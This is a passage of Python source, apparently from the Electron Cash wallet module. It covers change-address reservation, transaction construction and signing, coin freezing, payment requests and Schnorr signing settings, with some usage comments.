will be made available again once the wallet is re-opened.
On non-deterministic wallets, this returns an empty list.
"""
if count <= 0 or not hasattr(self, 'create_new_address'):
return []
with self.lock:
last_change_addrs = self.get_change_addresses()[-self.gap_limit_for_change:]
if not last_change_addrs:
# this happens in non-deterministic wallets but the above
# hasattr check should have caught those.
return []
def gen_change():
try:
while True:
yield self.change_unreserved.pop(0)
except IndexError:
pass
for addr in last_change_addrs:
yield addr
while True:
yield self.create_new_address(for_change=True)
result = []
for addr in gen_change():
if ( addr in self.change_reserved
or addr in self.change_reserved_tmp
or self.get_num_tx(addr) != 0
or addr in result):
continue
addr_str = addr.to_storage_string()
if self.labels.get(addr_str):
continue
result.append(addr)
if temporary:
self.change_reserved_tmp.add(addr)
else:
self.change_reserved.add(addr)
if len(result) >= count:
return result
raise RuntimeError("Unable to generate new addresses") # should not happen
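# Illustrative usage sketch (assumes a deterministic `wallet` instance):
# reserving change addresses temporarily and releasing one that ends up
# unused, as described in the docstring above.
#
#   addrs = wallet.reserve_change_addresses(2, temporary=True)
#   # ... build a tx that uses addrs ...
#   wallet.unreserve_change_address(addrs[1])  # never shared, so recycle it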
def unreserve_change_address(self, addr):
""" Unreserve an addr that was set by reserve_change_addresses, and
also explicitly reschedule this address to be usable by a future
reservation. Unreserving is appropriate when the address was never
actually shared or used in a transaction, and reduces empty gaps in
the change list.
"""
assert addr in self.get_change_addresses()
with self.lock:
self.change_reserved.discard(addr)
self.change_reserved_tmp.discard(addr)
self.change_unreserved.append(addr)
def get_default_change_addresses(self, count):
""" Return `count` change addresses from the default reserved list,
ignoring and removing used addresses. Reserves more as needed.
The same default change addresses keep getting repeated until they are
actually seen as used in a transaction from the network. Theoretically
this could hurt privacy if the user has multiple unsigned transactions
open at the same time, but practically this avoids address gaps for
normal usage. If you need non-repeated addresses, see
`reserve_change_addresses`.
On non-deterministic wallets, this returns an empty list.
"""
result = []
with self.lock:
for addr in list(self.change_reserved_default):
if len(result) >= count:
break
if self.get_num_tx(addr) != 0:
self.change_reserved_default.remove(addr)
continue
result.append(addr)
need_more = count - len(result)
if need_more > 0:
new_addrs = self.reserve_change_addresses(need_more)
self.change_reserved_default.extend(new_addrs)
result.extend(new_addrs)
return result
def make_unsigned_transaction(self, inputs, outputs, config, fixed_fee=None, change_addr=None, sign_schnorr=None):
''' sign_schnorr flag controls whether to mark the tx as signing with
schnorr or not. Specify either a bool, or set the flag to 'None' to use
whatever the wallet is configured to use from the GUI '''
sign_schnorr = self.is_schnorr_enabled() if sign_schnorr is None else bool(sign_schnorr)
# check outputs
i_max = None
for i, o in enumerate(outputs):
_type, data, value = o
if value == '!':
if i_max is not None:
raise BaseException("More than one output set to spend max")
i_max = i
# Avoid index-out-of-range with inputs[0] below
if not inputs:
raise NotEnoughFunds()
if fixed_fee is None and config.fee_per_kb() is None:
raise BaseException('Dynamic fee estimates not available')
for item in inputs:
self.add_input_info(item)
# Fee estimator
if fixed_fee is None:
fee_estimator = config.estimate_fee
else:
fee_estimator = lambda size: fixed_fee
if i_max is None:
# Let the coin chooser select the coins to spend
change_addrs = []
if change_addr:
change_addrs = [change_addr]
else:
# Currently the only code that uses this hook is the deprecated
# Cash Shuffle plugin
change_addrs = run_hook("get_change_addrs", self) or []
if not change_addrs:
# hook gave us nothing, so find a change addr from the change
# reservation subsystem
max_change = self.max_change_outputs if self.multiple_change else 1
if self.use_change:
change_addrs = self.get_default_change_addresses(max_change)
else:
change_addrs = []
if not change_addrs:
# For some reason we couldn't get any autogenerated change
# address (non-deterministic wallet?). So, try to find an
# input address that belongs to us.
for inp in inputs:
backup_addr = inp['address']
if self.is_mine(backup_addr):
change_addrs = [backup_addr]
break
else:
# ok, none of the inputs are "mine" (why?!) -- fall back
# to picking first max_change change_addresses that have
# no history
change_addrs = []
for addr in self.get_change_addresses()[-self.gap_limit_for_change:]:
if self.get_num_tx(addr) == 0:
change_addrs.append(addr)
if len(change_addrs) >= max_change:
break
if not change_addrs:
# No unused wallet addresses or no change addresses.
# Fall back to picking ANY wallet address
try:
# Pick a random address
change_addrs = [random.choice(self.get_addresses())]
except IndexError:
change_addrs = [] # Address-free wallet?!
# This should never happen
if not change_addrs:
raise RuntimeError("Can't find a change address!")
assert all(isinstance(addr, Address) for addr in change_addrs)
coin_chooser = coinchooser.CoinChooserPrivacy()
tx = coin_chooser.make_tx(inputs, outputs, change_addrs,
fee_estimator, self.dust_threshold(), sign_schnorr=sign_schnorr)
else:
sendable = sum(map(lambda x:x['value'], inputs))
_type, data, value = outputs[i_max]
outputs[i_max] = (_type, data, 0)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = fee_estimator(tx.estimated_size())
amount = max(0, sendable - tx.output_value() - fee)
outputs[i_max] = (_type, data, amount)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
# If the user tries to pay an excessive fee (more than 100 sat/byte), stop them from shooting themselves in the foot
tx_in_bytes = tx.estimated_size()
fee_in_satoshis = tx.get_fee()
sats_per_byte = fee_in_satoshis / tx_in_bytes
if sats_per_byte > 100:
raise ExcessiveFee()
# Sort the inputs and outputs deterministically
tx.BIP_LI01_sort()
# Timelock tx to current height.
locktime = self.get_local_height()
if locktime == -1: # We have no local height data (no headers synced).
locktime = 0
tx.locktime = locktime
run_hook('make_unsigned_transaction', self, tx)
return tx
def mktx(self, outputs, password, config, fee=None, change_addr=None, domain=None, sign_schnorr=None):
coins = self.get_spendable_coins(domain, config)
tx = self.make_unsigned_transaction(coins, outputs, config, fee, change_addr, sign_schnorr=sign_schnorr)
self.sign_transaction(tx, password)
return tx
def is_frozen(self, addr):
""" Address-level frozen query. Note: this is set/unset independent of
'coin' level freezing. """
assert isinstance(addr, Address)
return addr in self.frozen_addresses
def is_frozen_coin(self, utxo: Union[str, dict, Set[str]]) -> Union[bool, Set[str]]:
""" 'coin' level frozen query. Note: this is set/unset independent of
address-level freezing.
`utxo` is a prevout:n string, or a dict as returned from get_utxos(),
in which case a bool is returned.
`utxo` may also be a set of prevout:n strings in which case a set is
returned which is the intersection of the internal frozen coin sets
and the `utxo` set. """
assert isinstance(utxo, (str, dict, set))
if isinstance(utxo, dict):
name = ("{}:{}".format(utxo['prevout_hash'], utxo['prevout_n']))
ret = name in self.frozen_coins or name in self.frozen_coins_tmp
if ret != utxo['is_frozen_coin']:
self.print_error("*** WARNING: utxo has stale is_frozen_coin flag", name)
utxo['is_frozen_coin'] = ret # update stale flag
return ret
elif isinstance(utxo, set):
# set is returned
return (self.frozen_coins | self.frozen_coins_tmp) & utxo
else:
return utxo in self.frozen_coins or utxo in self.frozen_coins_tmp
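# Illustrative usage sketch (assumes `wallet` and a coin dict `c` as
# returned from get_utxos()): the three accepted input forms for
# is_frozen_coin().
#
#   wallet.is_frozen_coin("%s:%d" % (c['prevout_hash'], c['prevout_n']))  # -> bool
#   wallet.is_frozen_coin(c)           # -> bool, also refreshes c['is_frozen_coin']
#   wallet.is_frozen_coin({"txid:0", "txid:1"})  # -> subset that is frozen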
def set_frozen_state(self, addrs, freeze):
"""Set frozen state of the addresses to `freeze`, True or False. Note
that address-level freezing is set/unset independent of coin-level
freezing, however both must be satisfied for a coin to be defined as
spendable."""
if all(self.is_mine(addr) for addr in addrs):
if freeze:
self.frozen_addresses |= set(addrs)
else:
self.frozen_addresses -= set(addrs)
frozen_addresses = [addr.to_storage_string()
for addr in self.frozen_addresses]
self.storage.put('frozen_addresses', frozen_addresses)
return True
return False
def set_frozen_coin_state(self, utxos, freeze, *, temporary=False):
"""Set frozen state of the `utxos` to `freeze`, True or False. `utxos`
is a (possibly mixed) list of either "prevout:n" strings and/or
coin-dicts as returned from get_utxos(). Note that if passing prevout:n
strings as input, 'is_mine()' status is not checked for the specified
coin. Also note that coin-level freezing is set/unset independent of
address-level freezing, however both must be satisfied for a coin to be
defined as spendable.
The `temporary` flag only applies if `freeze = True`. In that case,
freezing coins will only affect the in-memory-only frozen set, which
doesn't get saved to storage. This mechanism was added so that plugins
(such as CashFusion) have a mechanism for ephemeral coin freezing that
doesn't persist across sessions.
Note that setting `freeze = False` effectively unfreezes both the
temporary and the permanent frozen coin sets all in 1 call. Thus after a
call to `set_frozen_coin_state(utxos, False)`, both the temporary and the
persistent frozen sets are cleared of all coins in `utxos`."""
add_set = self.frozen_coins if not temporary else self.frozen_coins_tmp
def add(utxo):
add_set.add(utxo)
def discard(utxo):
self.frozen_coins.discard(utxo)
self.frozen_coins_tmp.discard(utxo)
apply_operation = add if freeze else discard
original_size = len(self.frozen_coins)
with self.lock:
ok = 0
for utxo in utxos:
if isinstance(utxo, str):
apply_operation(utxo)
ok += 1
elif isinstance(utxo, dict):
txo = "{}:{}".format(utxo['prevout_hash'], utxo['prevout_n'])
apply_operation(txo)
utxo['is_frozen_coin'] = bool(freeze)
ok += 1
if original_size != len(self.frozen_coins):
# Performance optimization: only set storage if the perma-set
# changed.
self.storage.put('frozen_coins', list(self.frozen_coins))
return ok
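# Illustrative usage sketch (assumes `wallet` and a list of coin dicts
# `coins` from get_utxos()): ephemeral, in-memory-only coin freezing of the
# sort a plugin such as CashFusion might use.
#
#   wallet.set_frozen_coin_state(coins, True, temporary=True)  # not saved to storage
#   # ... later, clear both the temporary and persistent freezes:
#   wallet.set_frozen_coin_state(coins, False)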
def prepare_for_verifier(self):
# review transactions that are in the history
for addr, hist in self._history.items():
for tx_hash, tx_height in hist:
# add it in case it was previously unconfirmed
self.add_unverified_tx(tx_hash, tx_height)
# if we are on a pruning server, remove unverified transactions
with self.lock:
vr = list(self.verified_tx.keys()) + list(self.unverified_tx.keys())
for tx_hash in list(self.transactions):
if tx_hash not in vr:
self.print_error("removing transaction", tx_hash)
self.transactions.pop(tx_hash)
def start_threads(self, network):
self.network = network
if self.network:
self.start_pruned_txo_cleaner_thread()
self.prepare_for_verifier()
self.verifier = SPV(self.network, self)
self.synchronizer = Synchronizer(self, network)
finalization_print_error(self.verifier)
finalization_print_error(self.synchronizer)
network.add_jobs([self.verifier, self.synchronizer])
self.cashacct.start(self.network) # start cashacct network-dependent subsystem, network.add_jobs, etc
else:
self.verifier = None
self.synchronizer = None
def stop_threads(self):
if self.network:
# Note: synchronizer and verifier will remove themselves from the
# network thread the next time they run, as a result of the below
# release() calls.
# It is done this way (as opposed to an immediate clean-up here)
# because these objects need to do their clean-up actions in a
# thread-safe fashion from within the thread where they normally
# operate on their data structures.
self.cashacct.stop()
self.synchronizer.release()
self.verifier.release()
self.synchronizer = None
self.verifier = None
self.stop_pruned_txo_cleaner_thread()
# Now no references to the synchronizer or verifier
# remain so they will be GC-ed
self.storage.put('stored_height', self.get_local_height())
self.save_addresses()
self.save_transactions()
self.save_verified_tx() # implicit cashacct.save
self.storage.put('frozen_coins', list(self.frozen_coins))
self.save_change_reservations()
self.storage.write()
def start_pruned_txo_cleaner_thread(self):
self.pruned_txo_cleaner_thread = threading.Thread(target=self._clean_pruned_txo_thread, daemon=True, name='clean_pruned_txo_thread')
self.pruned_txo_cleaner_thread.q = queue.Queue()
self.pruned_txo_cleaner_thread.start()
def stop_pruned_txo_cleaner_thread(self):
t = self.pruned_txo_cleaner_thread
self.pruned_txo_cleaner_thread = None # this also signals a stop
if t and t.is_alive():
t.q.put(None) # signal stop
# if the join times out, it's ok. it means the thread was stuck in
# a network call and it will eventually exit.
t.join(timeout=3.0)
def wait_until_synchronized(self, callback=None, *, timeout=None):
tstart = time.time()
def check_timed_out():
if timeout is not None and time.time() - tstart > timeout:
raise TimeoutException()
def wait_for_wallet():
self.set_up_to_date(False)
while not self.is_up_to_date():
if callback:
msg = "%s\n%s %d"%(
_("Please wait..."),
_("Addresses generated:"),
len(self.addresses(True)))
callback(msg)
time.sleep(0.1)
check_timed_out()
def wait_for_network():
while not self.network.is_connected():
if callback:
msg = "%s \n" % (_("Connecting..."))
callback(msg)
time.sleep(0.1)
check_timed_out()
# wait until we are connected, because the user
# might have selected another server
if self.network:
wait_for_network()
wait_for_wallet()
else:
self.synchronize()
def can_export(self):
return not self.is_watching_only() and hasattr(self.keystore, 'get_private_key')
def is_used(self, address):
return self.get_address_history(address) and self.is_empty(address)
def is_empty(self, address):
assert isinstance(address, Address)
return not any(self.get_addr_balance(address))
def address_is_old(self, address, age_limit=2):
age = -1
local_height = self.get_local_height()
for tx_hash, tx_height in self.get_address_history(address):
if tx_height == 0:
tx_age = 0
else:
tx_age = local_height - tx_height + 1
if tx_age > age:
age = tx_age
if age > age_limit:
break # ok, it's old. no need to keep looping
return age > age_limit
def cpfp(self, tx, fee, sign_schnorr=None):
''' sign_schnorr is a bool or None for auto '''
sign_schnorr = self.is_schnorr_enabled() if sign_schnorr is None else bool(sign_schnorr)
txid = tx.txid()
for i, o in enumerate(tx.outputs()):
otype, address, value = o
if otype == bitcoin.TYPE_ADDRESS and self.is_mine(address):
break
else:
return
coins = self.get_addr_utxo(address)
item = coins.get(txid+':%d'%i)
if not item:
return
self.add_input_info(item)
inputs = [item]
outputs = [(bitcoin.TYPE_ADDRESS, address, value - fee)]
locktime = self.get_local_height()
# note: no need to call tx.BIP_LI01_sort() here - single input/output
return Transaction.from_io(inputs, outputs, locktime=locktime, sign_schnorr=sign_schnorr)
def add_input_info(self, txin):
address = txin['address']
if self.is_mine(address):
txin['type'] = self.get_txin_type(address)
# Bitcoin Cash needs value to sign
received, spent = self.get_addr_io(address)
item = received.get(txin['prevout_hash']+':%d'%txin['prevout_n'])
tx_height, value, is_cb = item
txin['value'] = value
self.add_input_sig_info(txin, address)
def can_sign(self, tx):
if tx.is_complete():
return False
for k in self.get_keystores():
# setup "wallet advice" so Xpub wallets know how to sign 'fd' type tx inputs
# by giving them the sequence number ahead of time
if isinstance(k, BIP32_KeyStore):
for txin in tx.inputs():
for x_pubkey in txin['x_pubkeys']:
_, addr = xpubkey_to_address(x_pubkey)
try:
c, index = self.get_address_index(addr)
except:
continue
if index is not None:
k.set_wallet_advice(addr, [c,index])
if k.can_sign(tx):
return True
return False
def get_input_tx(self, tx_hash):
# First look up an input transaction in the wallet where it
# will likely be. If co-signing a transaction it may not have
# all the input txs, in which case we ask the network.
tx = self.transactions.get(tx_hash)
if not tx and self.network:
request = ('blockchain.transaction.get', [tx_hash])
tx = Transaction(self.network.synchronous_get(request))
return tx
def add_input_values_to_tx(self, tx):
""" add input values to the tx, for signing"""
for txin in tx.inputs():
if 'value' not in txin:
inputtx = self.get_input_tx(txin['prevout_hash'])
if inputtx is not None:
out_zero, out_addr, out_val = inputtx.outputs()[txin['prevout_n']]
txin['value'] = out_val
txin['prev_tx'] = inputtx # may be needed by hardware wallets
def add_hw_info(self, tx):
# add previous tx for hw wallets, if needed and not already there
if any([(isinstance(k, Hardware_KeyStore) and k.can_sign(tx) and k.needs_prevtx()) for k in self.get_keystores()]):
for txin in tx.inputs():
if 'prev_tx' not in txin:
txin['prev_tx'] = self.get_input_tx(txin['prevout_hash'])
# add output info for hw wallets
info = {}
xpubs = self.get_master_public_keys()
for txout in tx.outputs():
_type, addr, amount = txout
if self.is_change(addr):
index = self.get_address_index(addr)
pubkeys = self.get_public_keys(addr)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
info[addr] = index, sorted_xpubs, self.m if isinstance(self, Multisig_Wallet) else None, self.txin_type
tx.output_info = info
def sign_transaction(self, tx, password, *, use_cache=False):
""" Sign a transaction, requires password (may be None for password-less
wallets). If `use_cache` is enabled then signing will be much faster.
For transactions with N inputs and M outputs, calculating all sighashes
takes only O(N + M) with the cache, as opposed to O(N^2 + NM) without
the cache.
Warning: If you modify non-signature parts of the transaction
afterwards, do not use `use_cache`! """
if self.is_watching_only():
return
# add input values for signing
self.add_input_values_to_tx(tx)
# hardware wallets require extra info
if any([(isinstance(k, Hardware_KeyStore) and k.can_sign(tx)) for k in self.get_keystores()]):
self.add_hw_info(tx)
# sign
for k in self.get_keystores():
try:
if k.can_sign(tx):
k.sign_transaction(tx, password, use_cache=use_cache)
except UserCancelled:
continue
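# Illustrative usage sketch (assumes `wallet`, `coins`, `outputs`, `config`
# and `password`): signing with the sighash cache enabled. Only safe if the
# transaction is not modified (other than adding signatures) afterwards.
#
#   tx = wallet.make_unsigned_transaction(coins, outputs, config)
#   wallet.sign_transaction(tx, password, use_cache=True)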
def get_unused_addresses(self, *, for_change=False, frozen_ok=True):
# fixme: use slots from expired requests
with self.lock:
domain = self.get_receiving_addresses() if not for_change else (self.get_change_addresses() or self.get_receiving_addresses())
return [addr for addr in domain
if not self.get_address_history(addr)
and addr not in self.receive_requests
and (frozen_ok or addr not in self.frozen_addresses)]
def get_unused_address(self, *, for_change=False, frozen_ok=True):
addrs = self.get_unused_addresses(for_change=for_change, frozen_ok=frozen_ok)
if addrs:
return addrs[0]
def get_receiving_address(self, *, frozen_ok=True):
'''Returns a receiving address or None.'''
domain = self.get_unused_addresses(frozen_ok=frozen_ok)
if not domain:
domain = [a for a in self.get_receiving_addresses()
if frozen_ok or a not in self.frozen_addresses]
if domain:
return domain[0]
def get_payment_status(self, address, amount):
local_height = self.get_local_height()
received, sent = self.get_addr_io(address)
l = []
for txo, x in received.items():
h, v, is_cb = x
txid, n = txo.split(':')
info = self.verified_tx.get(txid)
if info:
tx_height, timestamp, pos = info
conf = local_height - tx_height
else:
conf = 0
l.append((conf, v))
vsum = 0
for conf, v in reversed(sorted(l)):
vsum += v
if vsum >= amount:
return True, conf
return False, None
def has_payment_request(self, addr):
''' Returns True iff Address addr has any extant payment requests
(even if expired), False otherwise. '''
assert isinstance(addr, Address)
return bool(self.receive_requests.get(addr))
def get_payment_request(self, addr, config):
assert isinstance(addr, Address)
r = self.receive_requests.get(addr)
if not r:
return
out = copy.copy(r)
addr_text = addr.to_full_ui_string()
amount_text = format_satoshis(r['amount']) # fixme: this should not be localized
out['URI'] = '{}?amount={}'.format(addr_text, amount_text)
status, conf = self.get_request_status(addr)
out['status'] = status
if conf is not None:
out['confirmations'] = conf
# check if bip70 file exists
rdir = config.get('requests_dir')
if rdir:
key = out.get('id', addr.to_storage_string())
path = os.path.join(rdir, 'req', key[0], key[1], key)
if os.path.exists(path):
baseurl = 'file://' + rdir
rewrite = config.get('url_rewrite')
if rewrite:
baseurl = baseurl.replace(*rewrite)
out['request_url'] = os.path.join(baseurl, 'req', key[0], key[1], key, key)
out['URI'] += '&r=' + out['request_url']
if 'index_url' not in out:
out['index_url'] = os.path.join(baseurl, 'index.html') + '?id=' + key
websocket_server_announce = config.get('websocket_server_announce')
if websocket_server_announce:
out['websocket_server'] = websocket_server_announce
else:
out['websocket_server'] = config.get('websocket_server', 'localhost')
websocket_port_announce = config.get('websocket_port_announce')
if websocket_port_announce:
out['websocket_port'] = websocket_port_announce
else:
out['websocket_port'] = config.get('websocket_port', 9999)
return out
def get_request_status(self, key):
r = self.receive_requests.get(key)
if r is None:
return PR_UNKNOWN
address = r['address']
amount = r.get('amount')
timestamp = r.get('time', 0)
if timestamp and type(timestamp) != int:
timestamp = 0
expiration = r.get('exp')
if expiration and type(expiration) != int:
expiration = 0
conf = None
if amount:
paid, conf = self.get_payment_status(address, amount)
status = PR_PAID if paid else PR_UNPAID
if status == PR_UNPAID and expiration is not None and time.time() > timestamp + expiration:
status = PR_EXPIRED
else:
status = PR_UNKNOWN
return status, conf
def make_payment_request(self, addr, amount, message, expiration=None, *,
op_return=None, op_return_raw=None, payment_url=None, index_url=None):
assert isinstance(addr, Address)
if op_return and op_return_raw:
raise ValueError("both op_return and op_return_raw cannot be specified as arguments to make_payment_request")
timestamp = int(time.time())
_id = bh2u(bitcoin.Hash(
addr.to_storage_string() + "%d" % timestamp))[0:10]
d = {
'time': timestamp,
'amount': amount,
'exp': expiration,
'address': addr,
'memo': message,
'id': _id
}
if payment_url:
d['payment_url'] = payment_url + "/" + _id
if index_url:
d['index_url'] = index_url + "/" + _id
if op_return:
d['op_return'] = op_return
if op_return_raw:
d['op_return_raw'] = op_return_raw
return d
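# Illustrative usage sketch (assumes `wallet`, `config` and an Address
# `addr`): creating a payment request and registering it via
# add_payment_request() further below.
#
#   req = wallet.make_payment_request(addr, 100000, "invoice #42", expiration=3600)
#   wallet.add_payment_request(req, config)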
def serialize_request(self, r):
result = r.copy()
result['address'] = r['address'].to_storage_string()
return result
def save_payment_requests(self):
def delete_address(value):
del value['address']
return value
requests = {addr.to_storage_string() : delete_address(value.copy())
for addr, value in self.receive_requests.items()}
self.storage.put('payment_requests', requests)
self.storage.write()
def sign_payment_request(self, key, alias, alias_addr, password):
req = self.receive_requests.get(key)
alias_privkey = self.export_private_key(alias_addr, password)
pr = paymentrequest.make_unsigned_request(req)
paymentrequest.sign_request_with_alias(pr, alias, alias_privkey)
req['name'] = to_string(pr.pki_data)
req['sig'] = bh2u(pr.signature)
self.receive_requests[key] = req
self.save_payment_requests()
def add_payment_request(self, req, config, set_address_label=True):
addr = req['address']
addr_text = addr.to_storage_string()
amount = req['amount']
message = req['memo']
self.receive_requests[addr] = req
self.save_payment_requests()
if set_address_label:
self.set_label(addr_text, message) # should be a default label
rdir = config.get('requests_dir')
if rdir and amount is not None:
key = req.get('id', addr_text)
pr = paymentrequest.make_request(config, req)
path = os.path.join(rdir, 'req', key[0], key[1], key)
if not os.path.exists(path):
try:
os.makedirs(path)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
with open(os.path.join(path, key), 'wb') as f:
f.write(pr.SerializeToString())
# reload
req = self.get_payment_request(addr, config)
req['address'] = req['address'].to_full_ui_string()
with open(os.path.join(path, key + '.json'), 'w', encoding='utf-8') as f:
f.write(json.dumps(req))
def remove_payment_request(self, addr, config, clear_address_label_if_no_tx=True):
if isinstance(addr, str):
addr = Address.from_string(addr)
if addr not in self.receive_requests:
return False
r = self.receive_requests.pop(addr)
if clear_address_label_if_no_tx and not self.get_address_history(addr):
memo = r.get('memo')
# clear it only if the user didn't overwrite it with something else
if memo and memo == self.labels.get(addr.to_storage_string()):
self.set_label(addr, None)
rdir = config.get('requests_dir')
if rdir:
key = r.get('id', addr.to_storage_string())
for s in ['.json', '']:
n = os.path.join(rdir, 'req', key[0], key[1], key, key + s)
if os.path.exists(n):
os.unlink(n)
self.save_payment_requests()
return True
def get_sorted_requests(self, config):
m = map(lambda x: self.get_payment_request(x, config), self.receive_requests.keys())
try:
def f(x):
try:
addr = x['address']
return self.get_address_index(addr) or addr
except:
return addr
return sorted(m, key=f)
except TypeError:
# See issue #1231 -- can get inhomogeneous results in the above
# sorting function due to the 'or addr' possible return.
# This can happen if addresses for some reason drop out of wallet
# while, say, the history rescan is running and it can't yet find
# an address index for an address. In that case we will
# return an unsorted list to the caller.
return list(m)
def get_fingerprint(self):
raise NotImplementedError()
def can_import_privkey(self):
return False
def can_import_address(self):
return False
def can_delete_address(self):
return False
def is_multisig(self):
# Subclass Multisig_Wallet overrides this
return False
def is_hardware(self):
return any([isinstance(k, Hardware_KeyStore) for k in self.get_keystores()])
def add_address(self, address):
assert isinstance(address, Address)
self._addr_bal_cache.pop(address, None) # paranoia, not really necessary -- just want to maintain the invariant that when we modify address history below we invalidate cache.
self.invalidate_address_set_cache()
if address not in self._history:
self._history[address] = []
if self.synchronizer:
self.synchronizer.add(address)
self.cashacct.on_address_addition(address)
def has_password(self):
return self.storage.get('use_encryption', False)
def check_password(self, password):
self.keystore.check_password(password)
def sign_message(self, address, message, password):
index = self.get_address_index(address)
return self.keystore.sign_message(index, message, password)
def decrypt_message(self, pubkey, message, password):
addr = self.pubkeys_to_address(pubkey)
index = self.get_address_index(addr)
return self.keystore.decrypt_message(index, message, password)
def rebuild_history(self):
''' This is an advanced function for use in the GUI when the user
wants to resynch the whole wallet from scratch, preserving labels
and contacts. '''
if not self.network or not self.network.is_connected():
raise RuntimeError('Refusing to rebuild wallet without a valid server connection!')
if not self.synchronizer or not self.verifier:
raise RuntimeError('Refusing to rebuild a stopped wallet!')
network = self.network
self.stop_threads()
do_addr_save = False
with self.lock:
self.transactions.clear(); self.unverified_tx.clear(); self.verified_tx.clear()
self.clear_history()
if isinstance(self, Standard_Wallet):
# reset the address list to default too, just in case. New synchronizer will pick up the addresses again.
self.receiving_addresses, self.change_addresses = self.receiving_addresses[:self.gap_limit], self.change_addresses[:self.gap_limit_for_change]
do_addr_save = True
self.change_reserved.clear()
self.change_reserved_default.clear()
self.change_unreserved.clear()
self.change_reserved_tmp.clear()
self.invalidate_address_set_cache()
if do_addr_save:
self.save_addresses()
self.save_transactions()
self.save_change_reservations()
self.save_verified_tx() # implicit cashacct.save
self.storage.write()
self.start_threads(network)
self.network.trigger_callback('wallet_updated', self)
def is_schnorr_possible(self, reason: list = None) -> bool:
''' Returns True if this wallet type is capable of Schnorr signing.
`reason` is an optional list; on a False return, a translated string
explaining why Schnorr isn't possible is inserted into it. '''
ok = bool(not self.is_multisig() and not self.is_hardware())
if not ok and isinstance(reason, list):
reason.insert(0, _('Schnorr signatures are disabled for this wallet type.'))
return ok
def is_schnorr_enabled(self) -> bool:
''' Returns whether schnorr is enabled AND possible for this wallet.
Schnorr is enabled per-wallet. '''
if not self.is_schnorr_possible():
# Short-circuit out of here -- it's not even possible with this
# wallet type.
return False
ss_cfg = self.storage.get('sign_schnorr', None)
if ss_cfg is None:
# Schnorr was not set in config; figure out intelligent defaults,
# preferring Schnorr if it's at least as fast as ECDSA (based on
# which libs user has installed). Note for watching-only we default
# to off if unspecified regardless, to not break compatibility
# with air-gapped signing systems that have older EC installed
# on the signing system. This is to avoid underpaying fees if
# signing system doesn't use Schnorr. We can turn on default
# Schnorr on watching-only sometime in the future after enough
# time has passed that air-gapped systems are unlikely to not
# have Schnorr enabled by default.
# TO DO: Finish refactor of txn serialized format to handle this
# case better!
if (not self.is_watching_only()
and (schnorr.has_fast_sign()
or not ecc_fast.is_using_fast_ecc())):
# Prefer Schnorr, all things being equal.
# - If not watching-only & schnorr possible AND
# - Either Schnorr is fast sign (native, ABC's secp256k1),
# so use it by default
# - Or both ECDSA & Schnorr are slow (non-native);
# so use Schnorr in that case as well
ss_cfg = 2
else:
# This branch is reached if Schnorr is slow but ECDSA is fast
# (core's secp256k1 lib was found which lacks Schnorr) -- so we
# default it to off. Also if watching only we default off.
ss_cfg = 0
return bool(ss_cfg)
def set_schnorr_enabled(self, b: bool):
''' Enable schnorr for this wallet. Note that if Schnorr is not possible,
(due to missing libs or invalid wallet type) is_schnorr_enabled() will
still return False after calling this function with a True argument. '''
# Note: we will have '1' at some point in the future which will mean:
# 'ask me per tx', so for now True -> 2.
self.storage.put('sign_schnorr', 2 if b else 0)
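# Illustrative usage sketch (assumes `wallet`): toggling Schnorr signing
# per wallet. is_schnorr_enabled() can still return False after enabling it
# if the wallet type or the installed libs make Schnorr impossible.
#
#   wallet.set_schnorr_enabled(True)
#   reasons = []
#   if not wallet.is_schnorr_possible(reasons):
#       print("Schnorr unavailable:", reasons[0])
#   print("signing with schnorr:", wallet.is_schnorr_enabled())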
class Simple_Wallet(Abstract_Wallet):
# wallet with a single keystore
def get_keystore(self):
return self.keystore
def get_keystores(self):
return [self.keystore]
def is_watching_only(self):
return self.keystore.is_watching_only()
def can_change_password(self):
return self.keystore.can_change_password()
def update_password(self, old_pw, new_pw, encrypt=False):
if old_pw is None and self.has_password():
raise InvalidPassword()
if self.keystore is not None and self.keystore.can_change_password():
self.keystore.update_password(old_pw, new_pw)
self.save_keystore()
self.storage.set_password(new_pw, encrypt)
self.storage.write()
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
class ImportedWalletBase(Simple_Wallet):
txin_type = 'p2pkh'
def get_txin_type(self, address):
return self.txin_type
def can_delete_address(self):
return len(self.get_addresses()) > 1 # Cannot delete the last address
def has_seed(self):
return False
def is_deterministic(self):
return False
def is_change(self, address):
return False
def get_master_public_keys(self):
return []
def is_beyond_limit(self, address, is_change):
return False
def get_fingerprint(self):
return ''
def get_receiving_addresses(self):
return self.get_addresses()
def delete_address(self, address):
assert isinstance(address, Address)
all_addrs = self.get_addresses()
if len(all_addrs) <= 1 or address not in all_addrs:
return
del all_addrs
transactions_to_remove = set() # only referred to by this address
transactions_new = set() # txs that are not only referred to by address
with self.lock:
for addr, details in self._history.items():
if addr == address:
for tx_hash, height in details:
transactions_to_remove.add(tx_hash)
self.tx_addr_hist[tx_hash].discard(address)
if not self.tx_addr_hist.get(tx_hash):
self.tx_addr_hist.pop(tx_hash, None)
else:
for tx_hash, height in details:
transactions_new.add(tx_hash)
transactions_to_remove -= transactions_new
self._history.pop(address, None)
for tx_hash in transactions_to_remove:
self.remove_transaction(tx_hash)
self.tx_fees.pop(tx_hash, None)
self.verified_tx.pop(tx_hash, None)
self.unverified_tx.pop(tx_hash, None)
self.transactions.pop(tx_hash, None)
self._addr_bal_cache.pop(address, None) # not strictly necessary, above calls also have this side-effect. but here to be safe. :)
if self.verifier:
# TX is now gone. Toss its SPV proof in case we have it
# in memory. This allows the user to re-add the PK later and it
# will avoid the situation where the UI says "not verified"
# erroneously!
self.verifier.remove_spv_proof_for_tx(tx_hash)
# FIXME: what about pruned_txo?
self.storage.put('verified_tx3', self.verified_tx)
self.save_transactions()
self.set_label(address, None)
self.remove_payment_request(address, {})
self.set_frozen_state([address], False)
self.delete_address_derived(address)
self.cashacct.on_address_deletion(address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if above already wrote
class ImportedAddressWallet(ImportedWalletBase):
# Watch-only wallet of imported addresses
wallet_type = 'imported_addr'
def __init__(self, storage):
self._sorted = None
super().__init__(storage)
@classmethod
def from_text(cls, storage, text):
wallet = cls(storage)
for address in text.split():
wallet.import_address(Address.from_string(address))
return wallet
def is_watching_only(self):
return True
def get_keystores(self):
return []
def can_import_privkey(self):
return False
def load_keystore(self):
self.keystore = None
